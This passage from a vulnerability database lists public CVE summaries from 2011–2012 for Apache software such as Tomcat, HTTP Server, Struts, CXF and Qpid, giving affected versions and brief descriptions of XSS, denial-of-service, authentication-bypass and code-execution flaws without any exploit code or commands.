13853| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13854| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13855| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13856| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13857| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13858| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13859| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13860| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13861| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13862| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13863| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13864| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13865| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13866| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13867| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13868| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13869| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13870| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13871| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13872| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13873| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13874| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13875| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13876| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13877| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13878| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13879| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13880| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13881| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13882| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13883| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13884| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13885| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13886| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13887| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13888| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13889| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
13890| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
13891| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
13892| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
13893| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
13894| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
13895| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha do not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
13896| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
13897| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
13898| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
13899| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
13900| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
13901| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
13902| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
13903| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
13904| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
13905| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
13906| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
13907| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
13908| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
13909| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
13910| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
13911| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
13912| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
13913| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
13914| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
13915| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
13916| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
13917| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
13918| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
13919| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
13920| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
13921| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
13922| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
13923| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
13924| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
13925| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
13926| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
13927| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
13928| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
13929| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
13930| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
13931| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
13932| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
13933| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
13934| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
13935| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
13936| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
13937| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
13938| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
13939| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
13940| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
13941| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13942| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13943| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
13944| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
13945| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
13946| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
13947| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
13948| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
13949| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
13950| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
13951| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
13952| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
13953| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
13954| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
13955| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
13956| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
13957| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
13958| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
13959| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
13960| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
13961| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
13962| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
13963| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
13964| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
13965| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
13966| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
13967| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
13968| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
13969| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
